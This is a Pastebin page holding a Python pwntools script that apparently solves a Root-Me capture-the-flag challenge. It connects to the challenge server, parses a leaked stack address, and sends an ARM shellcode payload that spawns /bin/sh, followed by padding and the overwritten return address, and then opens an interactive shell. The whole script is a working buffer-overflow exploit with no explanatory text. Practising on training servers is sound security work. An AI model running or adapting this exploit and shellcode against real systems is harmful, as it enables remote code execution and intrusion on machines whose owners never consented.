Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #-*- coding: utf-8 -*-
- from pwn import *
- from struct import pack
- r = remote("challenge04.root-me.org",61045)
- s1 = r.readuntil(":\n")
- print (s1)
- r.sendline("A"*100)
- s2 = r.readuntil(":\n")
- print (s2)
- Adresse = s2[2:12]
- A1 = Adresse[6:8]
- A2 = Adresse[4:6]
- A3 = Adresse[2:4]
- A4 = Adresse[0:2]
- #print (A1)
- #print (A2)
- #print (A3)
- #print (A4)
- AdresseShellcode = "0x"+str(A4)+str(A3)+str(A2)+str(A1)
- print (AdresseShellcode)
- r.sendline("y")
- s3 = r.readuntil(":\n")
- print(s3)
- adresse = int(AdresseShellcode,16)
- p = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"+"A"*137
- p += pack('I',adresse)
- r.sendline(p)
- s3 = r.readuntil(":\n")
- print (s3)
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement